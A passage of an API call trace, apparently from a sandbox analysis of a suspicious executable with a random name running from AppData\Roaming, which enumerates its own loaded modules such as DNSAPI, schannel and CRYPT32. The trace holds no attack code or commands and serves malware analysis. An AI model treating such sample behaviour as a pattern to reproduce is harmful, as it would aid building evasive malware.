nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\dhcpcsvc6.DLL" (normalized: "c:\\windows\\syswow64\\dhcpcsvc6.dll")) returned 0x21 [0142.393] CoTaskMemFree (pv=0x55ab38) [0142.393] GetModuleInformation (in: hProcess=0x2a0, hModule=0x6a840000, lpmodinfo=0x2555184, cb=0xc | out: lpmodinfo=0x2555184*(lpBaseOfDll=0x6a840000, SizeOfImage=0x14000, EntryPoint=0x6a843c10)) returned 1 [0142.394] CoTaskMemAlloc (cb=0x804) returned 0x55ab38 [0142.394] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x6a840000, lpBaseName=0x55ab38, nSize=0x800 | out: lpBaseName="dhcpcsvc.DLL") returned 0xc [0142.395] CoTaskMemFree (pv=0x55ab38) [0142.395] CoTaskMemAlloc (cb=0x804) returned 0x55ab38 [0142.395] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x6a840000, lpFilename=0x55ab38, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\dhcpcsvc.DLL" (normalized: "c:\\windows\\syswow64\\dhcpcsvc.dll")) returned 0x20 [0142.396] CoTaskMemFree (pv=0x55ab38) [0142.396] GetModuleInformation (in: hProcess=0x2a0, hModule=0x74eb0000, lpmodinfo=0x2557298, cb=0xc | out: lpmodinfo=0x2557298*(lpBaseOfDll=0x74eb0000, SizeOfImage=0x13ff000, EntryPoint=0x7506b990)) returned 1 [0142.397] CoTaskMemAlloc (cb=0x804) returned 0x55ab38 [0142.397] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x74eb0000, lpBaseName=0x55ab38, nSize=0x800 | out: lpBaseName="shell32.dll") returned 0xb [0142.398] CoTaskMemFree (pv=0x55ab38) [0142.398] CoTaskMemAlloc (cb=0x804) returned 0x55ab38 [0142.398] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x74eb0000, lpFilename=0x55ab38, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\shell32.dll" (normalized: "c:\\windows\\syswow64\\shell32.dll")) returned 0x1f [0142.399] CoTaskMemFree (pv=0x55ab38) [0142.399] GetModuleInformation (in: hProcess=0x2a0, hModule=0x76800000, lpmodinfo=0x25593a4, cb=0xc | out: lpmodinfo=0x25593a4*(lpBaseOfDll=0x76800000, SizeOfImage=0x37000, EntryPoint=0x76803b50)) returned 1 [0142.401] CoTaskMemAlloc (cb=0x804) returned 0x55ab38 [0142.401] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x76800000, lpBaseName=0x55ab38, nSize=0x800 | out: lpBaseName="cfgmgr32.dll") returned 0xc [0142.402] CoTaskMemFree (pv=0x55ab38) [0142.402] CoTaskMemAlloc (cb=0x804) returned 0x55ab38 [0142.402] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x76800000, lpFilename=0x55ab38, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\cfgmgr32.dll" (normalized: "c:\\windows\\syswow64\\cfgmgr32.dll")) returned 0x20 [0142.403] CoTaskMemFree (pv=0x55ab38) [0142.403] GetModuleInformation (in: hProcess=0x2a0, hModule=0x745b0000, lpmodinfo=0x255b4b8, cb=0xc | out: lpmodinfo=0x255b4b8*(lpBaseOfDll=0x745b0000, SizeOfImage=0x4f9000, EntryPoint=0x747b7610)) returned 1 [0142.404] CoTaskMemAlloc (cb=0x804) returned 0x55ab38 [0142.404] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x745b0000, lpBaseName=0x55ab38, nSize=0x800 | out: lpBaseName="windows.storage.dll") returned 0x13 [0142.405] CoTaskMemFree (pv=0x55ab38) [0142.405] CoTaskMemAlloc (cb=0x804) returned 0x55ab38 [0142.405] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x745b0000, lpFilename=0x55ab38, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\windows.storage.dll" (normalized: "c:\\windows\\syswow64\\windows.storage.dll")) returned 0x27 [0142.406] CoTaskMemFree (pv=0x55ab38) [0142.406] GetModuleInformation (in: hProcess=0x2a0, hModule=0x74520000, lpmodinfo=0x255d5e4, cb=0xc | out: lpmodinfo=0x255d5e4*(lpBaseOfDll=0x74520000, SizeOfImage=0x8d000, EntryPoint=0x74569b90)) returned 1 [0142.407] CoTaskMemAlloc (cb=0x804) returned 0x55ab38 [0142.407] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x74520000, lpBaseName=0x55ab38, nSize=0x800 | out: lpBaseName="shcore.dll") returned 0xa [0142.408] CoTaskMemFree (pv=0x55ab38) [0142.408] CoTaskMemAlloc (cb=0x804) returned 0x55ab38 [0142.408] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x74520000, lpFilename=0x55ab38, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\shcore.dll" (normalized: "c:\\windows\\syswow64\\shcore.dll")) returned 0x1e [0142.410] CoTaskMemFree (pv=0x55ab38) [0142.410] GetModuleInformation (in: hProcess=0x2a0, hModule=0x76470000, lpmodinfo=0x255f6f0, cb=0xc | out: lpmodinfo=0x255f6f0*(lpBaseOfDll=0x76470000, SizeOfImage=0x44000, EntryPoint=0x76477410)) returned 1 [0142.411] CoTaskMemAlloc (cb=0x804) returned 0x55ab38 [0142.411] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x76470000, lpBaseName=0x55ab38, nSize=0x800 | out: lpBaseName="powrprof.dll") returned 0xc [0142.412] CoTaskMemFree (pv=0x55ab38) [0142.412] CoTaskMemAlloc (cb=0x804) returned 0x55ab38 [0142.412] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x76470000, lpFilename=0x55ab38, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\powrprof.dll" (normalized: "c:\\windows\\syswow64\\powrprof.dll")) returned 0x20 [0142.413] CoTaskMemFree (pv=0x55ab38) [0142.413] GetModuleInformation (in: hProcess=0x2a0, hModule=0x73f20000, lpmodinfo=0x2561804, cb=0xc | out: lpmodinfo=0x2561804*(lpBaseOfDll=0x73f20000, SizeOfImage=0xf000, EntryPoint=0x73f22e40)) returned 1 [0142.414] CoTaskMemAlloc (cb=0x804) returned 0x55ab38 [0142.414] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x73f20000, lpBaseName=0x55ab38, nSize=0x800 | out: lpBaseName="profapi.dll") returned 0xb [0142.415] CoTaskMemFree (pv=0x55ab38) [0142.415] CoTaskMemAlloc (cb=0x804) returned 0x55ab38 [0142.415] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x73f20000, lpFilename=0x55ab38, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\profapi.dll" (normalized: "c:\\windows\\syswow64\\profapi.dll")) returned 0x1f [0142.418] CoTaskMemFree (pv=0x55ab38) [0142.418] GetModuleInformation (in: hProcess=0x2a0, hModule=0x70a50000, lpmodinfo=0x2563910, cb=0xc | out: lpmodinfo=0x2563910*(lpBaseOfDll=0x70a50000, SizeOfImage=0x84000, EntryPoint=0x70a76530)) returned 1 [0142.419] CoTaskMemAlloc (cb=0x804) returned 0x55ab38 [0142.419] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x70a50000, lpBaseName=0x55ab38, nSize=0x800 | out: lpBaseName="DNSAPI.dll") returned 0xa [0142.420] CoTaskMemFree (pv=0x55ab38) [0142.420] CoTaskMemAlloc (cb=0x804) returned 0x55ab38 [0142.420] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x70a50000, lpFilename=0x55ab38, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\DNSAPI.dll" (normalized: "c:\\windows\\syswow64\\dnsapi.dll")) returned 0x1e [0142.422] CoTaskMemFree (pv=0x55ab38) [0142.422] GetModuleInformation (in: hProcess=0x2a0, hModule=0x713f0000, lpmodinfo=0x2565a1c, cb=0xc | out: lpmodinfo=0x2565a1c*(lpBaseOfDll=0x713f0000, SizeOfImage=0x8000, EntryPoint=0x713f1fc0)) returned 1 [0142.423] CoTaskMemAlloc (cb=0x804) returned 0x55ab38 [0142.423] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x713f0000, lpBaseName=0x55ab38, nSize=0x800 | out: lpBaseName="WINNSI.DLL") returned 0xa [0142.424] CoTaskMemFree (pv=0x55ab38) [0142.424] CoTaskMemAlloc (cb=0x804) returned 0x55ab38 [0142.424] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x713f0000, lpFilename=0x55ab38, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\WINNSI.DLL" (normalized: "c:\\windows\\syswow64\\winnsi.dll")) returned 0x1e [0142.425] CoTaskMemFree (pv=0x55ab38) [0142.425] GetModuleInformation (in: hProcess=0x2a0, hModule=0x6fa30000, lpmodinfo=0x2567b28, cb=0xc | out: lpmodinfo=0x2567b28*(lpBaseOfDll=0x6fa30000, SizeOfImage=0x8000, EntryPoint=0x6fa31920)) returned 1 [0142.426] CoTaskMemAlloc (cb=0x804) returned 0x55ab38 [0142.426] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x6fa30000, lpBaseName=0x55ab38, nSize=0x800 | out: lpBaseName="rasadhlp.dll") returned 0xc [0142.427] CoTaskMemFree (pv=0x55ab38) [0142.427] CoTaskMemAlloc (cb=0x804) returned 0x55ab38 [0142.427] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x6fa30000, lpFilename=0x55ab38, nSize=0x800 | out: lpFilename="C:\\Windows\\System32\\rasadhlp.dll" (normalized: "c:\\windows\\syswow64\\rasadhlp.dll")) returned 0x20 [0142.428] CoTaskMemFree (pv=0x55ab38) [0142.428] GetModuleInformation (in: hProcess=0x2a0, hModule=0x6f9e0000, lpmodinfo=0x2569c3c, cb=0xc | out: lpmodinfo=0x2569c3c*(lpBaseOfDll=0x6f9e0000, SizeOfImage=0x47000, EntryPoint=0x6f9f58d0)) returned 1 [0142.430] CoTaskMemAlloc (cb=0x804) returned 0x55ab38 [0142.430] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x6f9e0000, lpBaseName=0x55ab38, nSize=0x800 | out: lpBaseName="fwpuclnt.dll") returned 0xc [0142.431] CoTaskMemFree (pv=0x55ab38) [0142.431] CoTaskMemAlloc (cb=0x804) returned 0x55ab38 [0142.431] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x6f9e0000, lpFilename=0x55ab38, nSize=0x800 | out: lpFilename="C:\\Windows\\System32\\fwpuclnt.dll" (normalized: "c:\\windows\\syswow64\\fwpuclnt.dll")) returned 0x20 [0142.434] CoTaskMemFree (pv=0x55ab38) [0142.434] GetModuleInformation (in: hProcess=0x2a0, hModule=0x71540000, lpmodinfo=0x256bd50, cb=0xc | out: lpmodinfo=0x256bd50*(lpBaseOfDll=0x71540000, SizeOfImage=0x1b000, EntryPoint=0x71549050)) returned 1 [0142.435] CoTaskMemAlloc (cb=0x804) returned 0x55ab38 [0142.435] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x71540000, lpBaseName=0x55ab38, nSize=0x800 | out: lpBaseName="bcrypt.dll") returned 0xa [0142.436] CoTaskMemFree (pv=0x55ab38) [0142.436] CoTaskMemAlloc (cb=0x804) returned 0x55ab38 [0142.436] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x71540000, lpFilename=0x55ab38, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\bcrypt.dll" (normalized: "c:\\windows\\syswow64\\bcrypt.dll")) returned 0x1e [0142.437] CoTaskMemFree (pv=0x55ab38) [0142.437] GetModuleInformation (in: hProcess=0x2a0, hModule=0x6fdf0000, lpmodinfo=0x256de5c, cb=0xc | out: lpmodinfo=0x256de5c*(lpBaseOfDll=0x6fdf0000, SizeOfImage=0xa000, EntryPoint=0x6fdf3200)) returned 1 [0142.439] CoTaskMemAlloc (cb=0x804) returned 0x55ab38 [0142.439] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x6fdf0000, lpBaseName=0x55ab38, nSize=0x800 | out: lpBaseName="secur32.dll") returned 0xb [0142.440] CoTaskMemFree (pv=0x55ab38) [0142.440] CoTaskMemAlloc (cb=0x804) returned 0x55ab38 [0142.440] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x6fdf0000, lpFilename=0x55ab38, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\secur32.dll" (normalized: "c:\\windows\\syswow64\\secur32.dll")) returned 0x1f [0142.441] CoTaskMemFree (pv=0x55ab38) [0142.441] GetModuleInformation (in: hProcess=0x2a0, hModule=0x6f970000, lpmodinfo=0x256ff68, cb=0xc | out: lpmodinfo=0x256ff68*(lpBaseOfDll=0x6f970000, SizeOfImage=0x64000, EntryPoint=0x6f98afd0)) returned 1 [0142.442] CoTaskMemAlloc (cb=0x804) returned 0x55ab38 [0142.442] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x6f970000, lpBaseName=0x55ab38, nSize=0x800 | out: lpBaseName="schannel.dll") returned 0xc [0142.444] CoTaskMemFree (pv=0x55ab38) [0142.444] CoTaskMemAlloc (cb=0x804) returned 0x55ab38 [0142.444] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x6f970000, lpFilename=0x55ab38, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\schannel.dll" (normalized: "c:\\windows\\syswow64\\schannel.dll")) returned 0x20 [0142.445] CoTaskMemFree (pv=0x55ab38) [0142.445] GetModuleInformation (in: hProcess=0x2a0, hModule=0x73f90000, lpmodinfo=0x257207c, cb=0xc | out: lpmodinfo=0x257207c*(lpBaseOfDll=0x73f90000, SizeOfImage=0x178000, EntryPoint=0x73fe8a90)) returned 1 [0142.447] CoTaskMemAlloc (cb=0x804) returned 0x55ab38 [0142.447] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x73f90000, lpBaseName=0x55ab38, nSize=0x800 | out: lpBaseName="CRYPT32.dll") returned 0xb [0142.448] CoTaskMemFree (pv=0x55ab38) [0142.448] CoTaskMemAlloc (cb=0x804) returned 0x55ab38 [0142.448] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x73f90000, lpFilename=0x55ab38, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\CRYPT32.dll" (normalized: "c:\\windows\\syswow64\\crypt32.dll")) returned 0x1f [0142.449] CoTaskMemFree (pv=0x55ab38) [0142.449] GetModuleInformation (in: hProcess=0x2a0, hModule=0x764c0000, lpmodinfo=0x2574188, cb=0xc | out: lpmodinfo=0x2574188*(lpBaseOfDll=0x764c0000, SizeOfImage=0xe000, EntryPoint=0x764c5410)) returned 1 [0142.450] CoTaskMemAlloc (cb=0x804) returned 0x55ab38 [0142.450] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x764c0000, lpBaseName=0x55ab38, nSize=0x800 | out: lpBaseName="MSASN1.dll") returned 0xa [0142.452] CoTaskMemFree (pv=0x55ab38) [0142.452] CoTaskMemAlloc (cb=0x804) returned 0x55ab38 [0142.452] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x764c0000, lpFilename=0x55ab38, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\MSASN1.dll" (normalized: "c:\\windows\\syswow64\\msasn1.dll")) returned 0x1e [0142.453] CoTaskMemFree (pv=0x55ab38) [0142.453] GetModuleInformation (in: hProcess=0x2a0, hModule=0x6f960000, lpmodinfo=0x2576294, cb=0xc | out: lpmodinfo=0x2576294*(lpBaseOfDll=0x6f960000, SizeOfImage=0x10000, EntryPoint=0x6f964600)) returned 1 [0142.454] CoTaskMemAlloc (cb=0x804) returned 0x55ab38 [0142.454] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x6f960000, lpBaseName=0x55ab38, nSize=0x800 | out: lpBaseName="mskeyprotect.dll") returned 0x10 [0142.455] CoTaskMemFree (pv=0x55ab38) [0142.455] CoTaskMemAlloc (cb=0x804) returned 0x55ab38 [0142.455] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x6f960000, lpFilename=0x55ab38, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\mskeyprotect.dll" (normalized: "c:\\windows\\syswow64\\mskeyprotect.dll")) returned 0x24 [0142.457] CoTaskMemFree (pv=0x55ab38) [0142.457] GetModuleInformation (in: hProcess=0x2a0, hModule=0x6f940000, lpmodinfo=0x25785c4, cb=0xc | out: lpmodinfo=0x25785c4*(lpBaseOfDll=0x6f940000, SizeOfImage=0x20000, EntryPoint=0x6f94d120)) returned 1 [0142.458] CoTaskMemAlloc (cb=0x804) returned 0x55ab38 [0142.458] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x6f940000, lpBaseName=0x55ab38, nSize=0x800 | out: lpBaseName="ncrypt.dll") returned 0xa [0142.459] CoTaskMemFree (pv=0x55ab38) [0142.459] CoTaskMemAlloc (cb=0x804) returned 0x55ab38 [0142.459] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x6f940000, lpFilename=0x55ab38, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\ncrypt.dll" (normalized: "c:\\windows\\syswow64\\ncrypt.dll")) returned 0x1e [0142.461] CoTaskMemFree (pv=0x55ab38) [0142.461] GetModuleInformation (in: hProcess=0x2a0, hModule=0x6f910000, lpmodinfo=0x257a6d0, cb=0xc | out: lpmodinfo=0x257a6d0*(lpBaseOfDll=0x6f910000, SizeOfImage=0x2c000, EntryPoint=0x6f92bb10)) returned 1 [0142.462] CoTaskMemAlloc (cb=0x804) returned 0x55ab38 [0142.462] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x6f910000, lpBaseName=0x55ab38, nSize=0x800 | out: lpBaseName="NTASN1.dll") returned 0xa [0142.465] CoTaskMemFree (pv=0x55ab38) [0142.465] CoTaskMemAlloc (cb=0x804) returned 0x55ab38 [0142.465] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x6f910000, lpFilename=0x55ab38, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\NTASN1.dll" (normalized: "c:\\windows\\syswow64\\ntasn1.dll")) returned 0x1e [0142.466] CoTaskMemFree (pv=0x55ab38) [0142.466] GetModuleInformation (in: hProcess=0x2a0, hModule=0x6f8f0000, lpmodinfo=0x257c7dc, cb=0xc | out: lpmodinfo=0x257c7dc*(lpBaseOfDll=0x6f8f0000, SizeOfImage=0x1a000, EntryPoint=0x6f8ffa70)) returned 1 [0142.468] CoTaskMemAlloc (cb=0x804) returned 0x55ab38 [0142.468] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x6f8f0000, lpBaseName=0x55ab38, nSize=0x800 | out: lpBaseName="ncryptsslp.dll") returned 0xe [0142.469] CoTaskMemFree (pv=0x55ab38) [0142.469] CoTaskMemAlloc (cb=0x804) returned 0x55ab38 [0142.469] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x6f8f0000, lpFilename=0x55ab38, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\ncryptsslp.dll" (normalized: "c:\\windows\\syswow64\\ncryptsslp.dll")) returned 0x22 [0142.470] CoTaskMemFree (pv=0x55ab38) [0142.470] CloseHandle (hObject=0x2a0) returned 1 [0142.505] GetCurrentProcessId () returned 0xbb4 [0142.505] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xbb4) returned 0x2a0 [0142.505] EnumProcessModules (in: hProcess=0x2a0, lphModule=0x268a1fc, cb=0x100, lpcbNeeded=0x19e600 | out: lphModule=0x268a1fc, lpcbNeeded=0x19e600) returned 1 [0142.506] EnumProcessModules (in: hProcess=0x2a0, lphModule=0x268a308, cb=0x200, lpcbNeeded=0x19e600 | out: lphModule=0x268a308, lpcbNeeded=0x19e600) returned 1 [0142.507] GetModuleInformation (in: hProcess=0x2a0, hModule=0x400000, lpmodinfo=0x268a548, cb=0xc | out: lpmodinfo=0x268a548*(lpBaseOfDll=0x400000, SizeOfImage=0x8000, EntryPoint=0x0)) returned 1 [0142.508] CoTaskMemAlloc (cb=0x804) returned 0x55b0d0 [0142.508] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x400000, lpBaseName=0x55b0d0, nSize=0x800 | out: lpBaseName="jhghyftvgyjhjhgjhjhggfresewdxrcnvfhgfhggfrtreaebvcnbnc.exe") returned 0x3a [0142.508] CoTaskMemFree (pv=0x55b0d0) [0142.508] CoTaskMemAlloc (cb=0x804) returned 0x55b0d0 [0142.508] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x400000, lpFilename=0x55b0d0, nSize=0x800 | out: lpFilename="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\jhghyftvgyjhjhgjhjhggfresewdxrcnvfhgfhggfrtreaebvcnbnc.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\jhghyftvgyjhjhgjhjhggfresewdxrcnvfhgfhggfrtreaebvcnbnc.exe")) returned 0x60 [0142.508] CoTaskMemFree (pv=0x55b0d0) [0142.508] GetModuleInformation (in: hProcess=0x2a0, hModule=0x771d0000, lpmodinfo=0x268c754, cb=0xc | out: lpmodinfo=0x268c754*(lpBaseOfDll=0x771d0000, SizeOfImage=0x17b000, EntryPoint=0x0)) returned 1 [0142.508] CoTaskMemAlloc (cb=0x804) returned 0x55b0d0 [0142.508] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x771d0000, lpBaseName=0x55b0d0, nSize=0x800 | out: lpBaseName="ntdll.dll") returned 0x9 [0142.509] CoTaskMemFree (pv=0x55b0d0) [0142.509] CoTaskMemAlloc (cb=0x804) returned 0x55b0d0 [0142.509] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x771d0000, lpFilename=0x55b0d0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll")) returned 0x1d [0142.509] CoTaskMemFree (pv=0x55b0d0) [0142.509] GetModuleInformation (in: hProcess=0x2a0, hModule=0x6f850000, lpmodinfo=0x268e858, cb=0xc | out: lpmodinfo=0x268e858*(lpBaseOfDll=0x6f850000, SizeOfImage=0x59000, EntryPoint=0x6f860780)) returned 1 [0142.509] CoTaskMemAlloc (cb=0x804) returned 0x55b0d0 [0142.509] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x6f850000, lpBaseName=0x55b0d0, nSize=0x800 | out: lpBaseName="MSCOREE.DLL") returned 0xb [0142.509] CoTaskMemFree (pv=0x55b0d0) [0142.510] CoTaskMemAlloc (cb=0x804) returned 0x55b0d0 [0142.510] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x6f850000, lpFilename=0x55b0d0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\MSCOREE.DLL" (normalized: "c:\\windows\\syswow64\\mscoree.dll")) returned 0x1f [0142.510] CoTaskMemFree (pv=0x55b0d0) [0142.510] GetModuleInformation (in: hProcess=0x2a0, hModule=0x76720000, lpmodinfo=0x2690964, cb=0xc | out: lpmodinfo=0x2690964*(lpBaseOfDll=0x76720000, SizeOfImage=0xe0000, EntryPoint=0x76733980)) returned 1 [0142.510] CoTaskMemAlloc (cb=0x804) returned 0x55b0d0 [0142.510] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x76720000, lpBaseName=0x55b0d0, nSize=0x800 | out: lpBaseName="KERNEL32.dll") returned 0xc [0142.510] CoTaskMemFree (pv=0x55b0d0) [0142.511] CoTaskMemAlloc (cb=0x804) returned 0x55b0d0 [0142.511] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x76720000, lpFilename=0x55b0d0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\KERNEL32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll")) returned 0x20 [0142.511] CoTaskMemFree (pv=0x55b0d0) [0142.511] GetModuleInformation (in: hProcess=0x2a0, hModule=0x76910000, lpmodinfo=0x2692a78, cb=0xc | out: lpmodinfo=0x2692a78*(lpBaseOfDll=0x76910000, SizeOfImage=0x17e000, EntryPoint=0x769c1b90)) returned 1 [0142.511] CoTaskMemAlloc (cb=0x804) returned 0x55b0d0 [0142.511] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x76910000, lpBaseName=0x55b0d0, nSize=0x800 | out: lpBaseName="KERNELBASE.dll") returned 0xe [0142.512] CoTaskMemFree (pv=0x55b0d0) [0142.512] CoTaskMemAlloc (cb=0x804) returned 0x55b0d0 [0142.512] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x76910000, lpFilename=0x55b0d0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\KERNELBASE.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll")) returned 0x22 [0142.512] CoTaskMemFree (pv=0x55b0d0) [0142.512] GetModuleInformation (in: hProcess=0x2a0, hModule=0x73e50000, lpmodinfo=0x2694bc0, cb=0xc | out: lpmodinfo=0x2694bc0*(lpBaseOfDll=0x73e50000, SizeOfImage=0x92000, EntryPoint=0x73e90380)) returned 1 [0142.512] CoTaskMemAlloc (cb=0x804) returned 0x55b0d0 [0142.512] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x73e50000, lpBaseName=0x55b0d0, nSize=0x800 | out: lpBaseName="apphelp.dll") returned 0xb [0142.513] CoTaskMemFree (pv=0x55b0d0) [0142.513] CoTaskMemAlloc (cb=0x804) returned 0x55b0d0 [0142.513] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x73e50000, lpFilename=0x55b0d0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\apphelp.dll" (normalized: "c:\\windows\\syswow64\\apphelp.dll")) returned 0x1f [0142.513] CoTaskMemFree (pv=0x55b0d0) [0142.513] GetModuleInformation (in: hProcess=0x2a0, hModule=0x76600000, lpmodinfo=0x2696ccc, cb=0xc | out: lpmodinfo=0x2696ccc*(lpBaseOfDll=0x76600000, SizeOfImage=0x7b000, EntryPoint=0x7661e970)) returned 1 [0142.513] CoTaskMemAlloc (cb=0x804) returned 0x55b0d0 [0142.513] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x76600000, lpBaseName=0x55b0d0, nSize=0x800 | out: lpBaseName="ADVAPI32.dll") returned 0xc [0142.513] CoTaskMemFree (pv=0x55b0d0) [0142.514] CoTaskMemAlloc (cb=0x804) returned 0x55b0d0 [0142.514] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x76600000, lpFilename=0x55b0d0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\ADVAPI32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll")) returned 0x20 [0142.514] CoTaskMemFree (pv=0x55b0d0) [0142.514] GetModuleInformation (in: hProcess=0x2a0, hModule=0x76a90000, lpmodinfo=0x2698de0, cb=0xc | out: lpmodinfo=0x2698de0*(lpBaseOfDll=0x76a90000, SizeOfImage=0xbe000, EntryPoint=0x76ac5630)) returned 1 [0142.514] CoTaskMemAlloc (cb=0x804) returned 0x55b0d0 [0142.514] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x76a90000, lpBaseName=0x55b0d0, nSize=0x800 | out: lpBaseName="msvcrt.dll") returned 0xa [0142.514] CoTaskMemFree (pv=0x55b0d0) [0142.515] CoTaskMemAlloc (cb=0x804) returned 0x55b0d0 [0142.515] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x76a90000, lpFilename=0x55b0d0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll")) returned 0x1e [0142.515] CoTaskMemFree (pv=0x55b0d0) [0142.515] GetModuleInformation (in: hProcess=0x2a0, hModule=0x76cb0000, lpmodinfo=0x269aeec, cb=0xc | out: lpmodinfo=0x269aeec*(lpBaseOfDll=0x76cb0000, SizeOfImage=0x44000, EntryPoint=0x76cc9d80)) returned 1 [0142.515] CoTaskMemAlloc (cb=0x804) returned 0x55b0d0 [0142.515] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x76cb0000, lpBaseName=0x55b0d0, nSize=0x800 | out: lpBaseName="sechost.dll") returned 0xb [0142.516] CoTaskMemFree (pv=0x55b0d0) [0142.516] CoTaskMemAlloc (cb=0x804) returned 0x55b0d0 [0142.516] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x76cb0000, lpFilename=0x55b0d0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll")) returned 0x1f [0142.516] CoTaskMemFree (pv=0x55b0d0) [0142.516] GetModuleInformation (in: hProcess=0x2a0, hModule=0x76c00000, lpmodinfo=0x269d044, cb=0xc | out: lpmodinfo=0x269d044*(lpBaseOfDll=0x76c00000, SizeOfImage=0xad000, EntryPoint=0x76c14f00)) returned 1 [0142.516] CoTaskMemAlloc (cb=0x804) returned 0x55b0d0 [0142.516] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x76c00000, lpBaseName=0x55b0d0, nSize=0x800 | out: lpBaseName="RPCRT4.dll") returned 0xa [0142.517] CoTaskMemFree (pv=0x55b0d0) [0142.517] CoTaskMemAlloc (cb=0x804) returned 0x55b0d0 [0142.517] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x76c00000, lpFilename=0x55b0d0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\RPCRT4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll")) returned 0x1e [0142.517] CoTaskMemFree (pv=0x55b0d0) [0142.517] GetModuleInformation (in: hProcess=0x2a0, hModule=0x73f00000, lpmodinfo=0x269f150, cb=0xc | out: 